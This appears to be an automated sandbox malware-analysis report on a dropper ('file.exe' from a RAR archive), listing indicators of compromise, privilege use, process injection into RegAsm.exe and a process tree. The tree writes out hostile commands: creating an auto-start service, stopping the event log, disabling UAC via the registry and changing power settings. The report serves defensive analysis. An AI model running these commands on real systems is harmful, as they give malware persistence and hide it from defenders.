0313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 7MIpvZeCZgl5ZPeAuQtK9vkn.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exelvwWiigbPRQHkX1WiI1R7O9N.exeHst3lrLxOp00o64vOZXF5TK2.exeHeIaw9JVr_srPOb759oFOk3h.exeYeIXGSxWKaTAiDgamD7WXkA9.exew7u18e_0lbq7_yG06w2Nbj5d.exeRegAsm.exepowershell.exerun.exepid process 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2732 Hst3lrLxOp00o64vOZXF5TK2.exe 2732 Hst3lrLxOp00o64vOZXF5TK2.exe 2484 taskmgr.exe 2484 taskmgr.exe 4272 HeIaw9JVr_srPOb759oFOk3h.exe 4272 HeIaw9JVr_srPOb759oFOk3h.exe 2484 taskmgr.exe 2484 taskmgr.exe 2676 YeIXGSxWKaTAiDgamD7WXkA9.exe 2676 YeIXGSxWKaTAiDgamD7WXkA9.exe 3176 w7u18e_0lbq7_yG06w2Nbj5d.exe 3176 w7u18e_0lbq7_yG06w2Nbj5d.exe 2484 taskmgr.exe 4272 HeIaw9JVr_srPOb759oFOk3h.exe 4272 HeIaw9JVr_srPOb759oFOk3h.exe 2676 YeIXGSxWKaTAiDgamD7WXkA9.exe 2676 YeIXGSxWKaTAiDgamD7WXkA9.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 4564 RegAsm.exe 4564 RegAsm.exe 4272 HeIaw9JVr_srPOb759oFOk3h.exe 4272 HeIaw9JVr_srPOb759oFOk3h.exe 2484 taskmgr.exe 5104 powershell.exe 5104 powershell.exe 2484 taskmgr.exe 5104 powershell.exe 2484 taskmgr.exe 5104 powershell.exe 2484 taskmgr.exe 192 run.exe 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 2484 taskmgr.exe 2484 taskmgr.exe 192 run.exe 192 run.exe 2484 taskmgr.exe 2484 taskmgr.exe 3176 w7u18e_0lbq7_yG06w2Nbj5d.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
7zG.exetaskmgr.exepid process 3948 7zG.exe 2484 taskmgr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 636 -
Suspicious behavior: MapViewOfSection 31 IoCs
Processes:
run.execmd.exeMicrosoftEdgeCP.exerun.execmd.exerun.execmd.exeMicrosoftEdgeCP.exepid process 192 run.exe 1520 cmd.exe 1520 cmd.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 4228 MicrosoftEdgeCP.exe 7332 run.exe 7736 cmd.exe 7736 cmd.exe 6836 run.exe 5600 cmd.exe 5600 cmd.exe 9144 MicrosoftEdgeCP.exe 9144 MicrosoftEdgeCP.exe 9144 MicrosoftEdgeCP.exe 9144 MicrosoftEdgeCP.exe 9144 MicrosoftEdgeCP.exe 9144 MicrosoftEdgeCP.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
chrome.exechrome.exepid process 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 6136 chrome.exe 6136 chrome.exe 6136 chrome.exe 6136 chrome.exe 6136 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zG.exetaskmgr.exeRegAsm.exepowershell.exeWMIC.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exechrome.exedescription pid process Token: SeRestorePrivilege 3948 7zG.exe Token: 35 3948 7zG.exe Token: SeSecurityPrivilege 3948 7zG.exe Token: SeSecurityPrivilege 3948 7zG.exe Token: SeDebugPrivilege 2484 taskmgr.exe Token: SeSystemProfilePrivilege 2484 taskmgr.exe Token: SeCreateGlobalPrivilege 2484 taskmgr.exe Token: SeDebugPrivilege 4564 RegAsm.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeIncreaseQuotaPrivilege 2380 WMIC.exe Token: SeSecurityPrivilege 2380 WMIC.exe Token: SeTakeOwnershipPrivilege 2380 WMIC.exe Token: SeLoadDriverPrivilege 2380 WMIC.exe Token: SeSystemProfilePrivilege 2380 WMIC.exe Token: SeSystemtimePrivilege 2380 WMIC.exe Token: SeProfSingleProcessPrivilege 2380 WMIC.exe Token: SeIncBasePriorityPrivilege 2380 WMIC.exe Token: SeCreatePagefilePrivilege 2380 WMIC.exe Token: SeBackupPrivilege 2380 WMIC.exe Token: SeRestorePrivilege 2380 WMIC.exe Token: SeShutdownPrivilege 2380 WMIC.exe Token: SeDebugPrivilege 2380 WMIC.exe Token: SeSystemEnvironmentPrivilege 2380 WMIC.exe Token: SeRemoteShutdownPrivilege 2380 WMIC.exe Token: SeUndockPrivilege 2380 WMIC.exe Token: SeManageVolumePrivilege 2380 WMIC.exe Token: 33 2380 WMIC.exe Token: 34 2380 WMIC.exe Token: 35 2380 WMIC.exe Token: 36 2380 WMIC.exe Token: SeIncreaseQuotaPrivilege 2380 WMIC.exe Token: SeSecurityPrivilege 2380 WMIC.exe Token: SeTakeOwnershipPrivilege 2380 WMIC.exe Token: SeLoadDriverPrivilege 2380 WMIC.exe Token: SeSystemProfilePrivilege 2380 WMIC.exe Token: SeSystemtimePrivilege 2380 WMIC.exe Token: SeProfSingleProcessPrivilege 2380 WMIC.exe Token: SeIncBasePriorityPrivilege 2380 WMIC.exe Token: SeCreatePagefilePrivilege 2380 WMIC.exe Token: SeBackupPrivilege 2380 WMIC.exe Token: SeRestorePrivilege 2380 WMIC.exe Token: SeShutdownPrivilege 2380 WMIC.exe Token: SeDebugPrivilege 2380 WMIC.exe Token: SeSystemEnvironmentPrivilege 2380 WMIC.exe Token: SeRemoteShutdownPrivilege 2380 WMIC.exe Token: SeUndockPrivilege 2380 WMIC.exe Token: SeManageVolumePrivilege 2380 WMIC.exe Token: 33 2380 WMIC.exe Token: 34 2380 WMIC.exe Token: 35 2380 WMIC.exe Token: 36 2380 WMIC.exe Token: SeShutdownPrivilege 2328 powercfg.exe Token: SeCreatePagefilePrivilege 2328 powercfg.exe Token: SeShutdownPrivilege 4188 powercfg.exe Token: SeCreatePagefilePrivilege 4188 powercfg.exe Token: SeShutdownPrivilege 1108 powercfg.exe Token: SeCreatePagefilePrivilege 1108 powercfg.exe Token: SeShutdownPrivilege 5112 powercfg.exe Token: SeCreatePagefilePrivilege 5112 powercfg.exe Token: SeShutdownPrivilege 2192 chrome.exe Token: SeCreatePagefilePrivilege 2192 chrome.exe Token: SeShutdownPrivilege 2192 chrome.exe Token: SeCreatePagefilePrivilege 2192 chrome.exe Token: SeShutdownPrivilege 2192 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zG.exetaskmgr.exechrome.exepid process 3948 7zG.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exechrome.exepid process 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2484 taskmgr.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe 2192 chrome.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
OpenWith.exeOpenWith.exefile.exeH7vqBgvStVLgPDsFhYslN7In.exeluhXBiuEvI6m3KxAsSfTpgok.exeAnDuBYZ639CmLSQ8NUtablTR.exeYeIXGSxWKaTAiDgamD7WXkA9.exepGQrSVf4_mIUyUtVNqNoton6.exeHeIaw9JVr_srPOb759oFOk3h.exeHst3lrLxOp00o64vOZXF5TK2.exezlbyhhvqluAa2YWd57tl7eT_.exelvwWiigbPRQHkX1WiI1R7O9N.exeRegAsm.exeH7vqBgvStVLgPDsFhYslN7In.tmpRegAsm.exeInstall.exempcvideostar.exempcvideostar.exeInstall.exerun.exeWFAhAmhGq1gP_X_914kc.exexpdQqUQXQWa0iRQg0uFa.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe41759ac5d4.exerun.exeMSBuild.exerun.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 4012 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 1560 OpenWith.exe 2432 file.exe 4676 H7vqBgvStVLgPDsFhYslN7In.exe 2708 luhXBiuEvI6m3KxAsSfTpgok.exe 4336 AnDuBYZ639CmLSQ8NUtablTR.exe 2676 YeIXGSxWKaTAiDgamD7WXkA9.exe 2004 pGQrSVf4_mIUyUtVNqNoton6.exe 4272 HeIaw9JVr_srPOb759oFOk3h.exe 2732 Hst3lrLxOp00o64vOZXF5TK2.exe 4756 zlbyhhvqluAa2YWd57tl7eT_.exe 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 4564 RegAsm.exe 2092 H7vqBgvStVLgPDsFhYslN7In.tmp 2540 RegAsm.exe 2556 Install.exe 4440 mpcvideostar.exe 3444 mpcvideostar.exe 4116 Install.exe 192 run.exe 192 run.exe 192 run.exe 4812 WFAhAmhGq1gP_X_914kc.exe 5388 xpdQqUQXQWa0iRQg0uFa.exe 5824 MicrosoftEdge.exe 4228 MicrosoftEdgeCP.exe 3088 MicrosoftEdgeCP.exe 4316 41759ac5d4.exe 4228 MicrosoftEdgeCP.exe 7332 run.exe 7332 run.exe 2708 MSBuild.exe 6836 run.exe 6836 run.exe 8196 MicrosoftEdge.exe 9144 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeluhXBiuEvI6m3KxAsSfTpgok.exezlbyhhvqluAa2YWd57tl7eT_.exeH7vqBgvStVLgPDsFhYslN7In.exedescription pid process target process PID 2432 wrote to memory of 3176 2432 file.exe w7u18e_0lbq7_yG06w2Nbj5d.exe PID 2432 wrote to memory of 3176 2432 file.exe w7u18e_0lbq7_yG06w2Nbj5d.exe PID 2432 wrote to memory of 4676 2432 file.exe H7vqBgvStVLgPDsFhYslN7In.exe PID 2432 wrote to memory of 4676 2432 file.exe H7vqBgvStVLgPDsFhYslN7In.exe PID 2432 wrote to memory of 4676 2432 file.exe H7vqBgvStVLgPDsFhYslN7In.exe PID 2432 wrote to memory of 2708 2432 file.exe luhXBiuEvI6m3KxAsSfTpgok.exe PID 2432 wrote to memory of 2708 2432 file.exe luhXBiuEvI6m3KxAsSfTpgok.exe PID 2432 wrote to memory of 2708 2432 file.exe luhXBiuEvI6m3KxAsSfTpgok.exe PID 2432 wrote to memory of 4272 2432 file.exe HeIaw9JVr_srPOb759oFOk3h.exe PID 2432 wrote to memory of 4272 2432 file.exe HeIaw9JVr_srPOb759oFOk3h.exe PID 2432 wrote to memory of 4272 2432 file.exe HeIaw9JVr_srPOb759oFOk3h.exe PID 2432 wrote to memory of 4336 2432 file.exe AnDuBYZ639CmLSQ8NUtablTR.exe PID 2432 wrote to memory of 4336 2432 file.exe AnDuBYZ639CmLSQ8NUtablTR.exe PID 2432 wrote to memory of 4336 2432 file.exe AnDuBYZ639CmLSQ8NUtablTR.exe PID 2432 wrote to memory of 4264 2432 file.exe tboJHJHII9Q9oJjVSOI6pAdI.exe PID 2432 wrote to memory of 4264 2432 file.exe tboJHJHII9Q9oJjVSOI6pAdI.exe PID 2432 wrote to memory of 4264 2432 file.exe tboJHJHII9Q9oJjVSOI6pAdI.exe PID 2432 wrote to memory of 1316 2432 file.exe mps245jJroRl14O6Z4MCwgJe.exe PID 2432 wrote to memory of 1316 2432 file.exe mps245jJroRl14O6Z4MCwgJe.exe PID 2432 wrote to memory of 1316 2432 file.exe mps245jJroRl14O6Z4MCwgJe.exe PID 2432 wrote to memory of 2732 2432 file.exe Hst3lrLxOp00o64vOZXF5TK2.exe PID 2432 wrote to memory of 2732 2432 file.exe Hst3lrLxOp00o64vOZXF5TK2.exe PID 2432 wrote to memory of 2732 2432 file.exe Hst3lrLxOp00o64vOZXF5TK2.exe PID 2432 wrote to memory of 4756 2432 file.exe zlbyhhvqluAa2YWd57tl7eT_.exe PID 2432 wrote to memory of 4756 2432 file.exe zlbyhhvqluAa2YWd57tl7eT_.exe PID 2432 wrote to memory of 4756 2432 file.exe zlbyhhvqluAa2YWd57tl7eT_.exe PID 2432 wrote to memory of 3500 2432 file.exe lvwWiigbPRQHkX1WiI1R7O9N.exe PID 2432 wrote to memory of 3500 2432 file.exe lvwWiigbPRQHkX1WiI1R7O9N.exe PID 2432 wrote to memory of 3500 2432 file.exe lvwWiigbPRQHkX1WiI1R7O9N.exe PID 2432 wrote to memory of 1172 2432 file.exe ABdncqG0qcBNNomxh8SNa7uR.exe PID 2432 wrote to memory of 1172 2432 file.exe ABdncqG0qcBNNomxh8SNa7uR.exe PID 2432 wrote to memory of 1172 2432 file.exe ABdncqG0qcBNNomxh8SNa7uR.exe PID 2432 wrote to memory of 2572 2432 file.exe DOwOUFOet7eMC5vx2MOYygTD.exe PID 2432 wrote to memory of 2572 2432 file.exe DOwOUFOet7eMC5vx2MOYygTD.exe PID 2432 wrote to memory of 2572 2432 file.exe DOwOUFOet7eMC5vx2MOYygTD.exe PID 2432 wrote to memory of 2676 2432 file.exe YeIXGSxWKaTAiDgamD7WXkA9.exe PID 2432 wrote to memory of 2676 2432 file.exe YeIXGSxWKaTAiDgamD7WXkA9.exe PID 2432 wrote to memory of 2676 2432 file.exe YeIXGSxWKaTAiDgamD7WXkA9.exe PID 2432 wrote to memory of 2004 2432 file.exe pGQrSVf4_mIUyUtVNqNoton6.exe PID 2432 wrote to memory of 2004 2432 file.exe pGQrSVf4_mIUyUtVNqNoton6.exe PID 2432 wrote to memory of 2004 2432 file.exe pGQrSVf4_mIUyUtVNqNoton6.exe PID 2708 wrote to memory of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 2708 wrote to memory of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 2708 wrote to memory of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 4756 wrote to memory of 4720 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 4720 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 4720 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 2708 wrote to memory of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 2708 wrote to memory of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 2708 wrote to memory of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 2708 wrote to memory of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 2708 wrote to memory of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4756 wrote to memory of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 4676 wrote to memory of 2092 4676 H7vqBgvStVLgPDsFhYslN7In.exe H7vqBgvStVLgPDsFhYslN7In.tmp PID 4676 wrote to memory of 2092 4676 H7vqBgvStVLgPDsFhYslN7In.exe H7vqBgvStVLgPDsFhYslN7In.tmp -
System policy modification 1 TTPs 1 IoCs
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
AnDuBYZ639CmLSQ8NUtablTR.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AnDuBYZ639CmLSQ8NUtablTR.exe -
outlook_win_path 1 IoCs
Processes:
AnDuBYZ639CmLSQ8NUtablTR.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AnDuBYZ639CmLSQ8NUtablTR.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\v4_file_x86x64.rar1⤵PID:2676
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4012
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:516
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\v4_file_x86x64\" -ad -an -ai#7zMap12195:108:7zEvent243871⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3948
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1560
-
C:\Users\Admin\Desktop\v4_file_x86x64\file.exe"C:\Users\Admin\Desktop\v4_file_x86x64\file.exe"1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Users\Admin\Documents\SimpleAdobe\w7u18e_0lbq7_yG06w2Nbj5d.exeC:\Users\Admin\Documents\SimpleAdobe\w7u18e_0lbq7_yG06w2Nbj5d.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3176 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4188 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:5112 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
PID:5092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4524
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
PID:5312 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5396 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
PID:5404 -
C:\Users\Admin\Documents\SimpleAdobe\HeIaw9JVr_srPOb759oFOk3h.exeC:\Users\Admin\Documents\SimpleAdobe\HeIaw9JVr_srPOb759oFOk3h.exe2⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4272 -
C:\Users\Admin\Documents\SimpleAdobe\H7vqBgvStVLgPDsFhYslN7In.exeC:\Users\Admin\Documents\SimpleAdobe\H7vqBgvStVLgPDsFhYslN7In.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Users\Admin\AppData\Local\Temp\is-QASNT.tmp\H7vqBgvStVLgPDsFhYslN7In.tmp"C:\Users\Admin\AppData\Local\Temp\is-QASNT.tmp\H7vqBgvStVLgPDsFhYslN7In.tmp" /SL5="$1038C,4487376,53248,C:\Users\Admin\Documents\SimpleAdobe\H7vqBgvStVLgPDsFhYslN7In.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2092 -
C:\Users\Admin\AppData\Local\Mpc Video Star\mpcvideostar.exe"C:\Users\Admin\AppData\Local\Mpc Video Star\mpcvideostar.exe" -i4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4440 -
C:\Users\Admin\AppData\Local\Mpc Video Star\mpcvideostar.exe"C:\Users\Admin\AppData\Local\Mpc Video Star\mpcvideostar.exe" -s4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3444 -
C:\Users\Admin\Documents\SimpleAdobe\luhXBiuEvI6m3KxAsSfTpgok.exeC:\Users\Admin\Documents\SimpleAdobe\luhXBiuEvI6m3KxAsSfTpgok.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 5043⤵
- Program crash
PID:2752 -
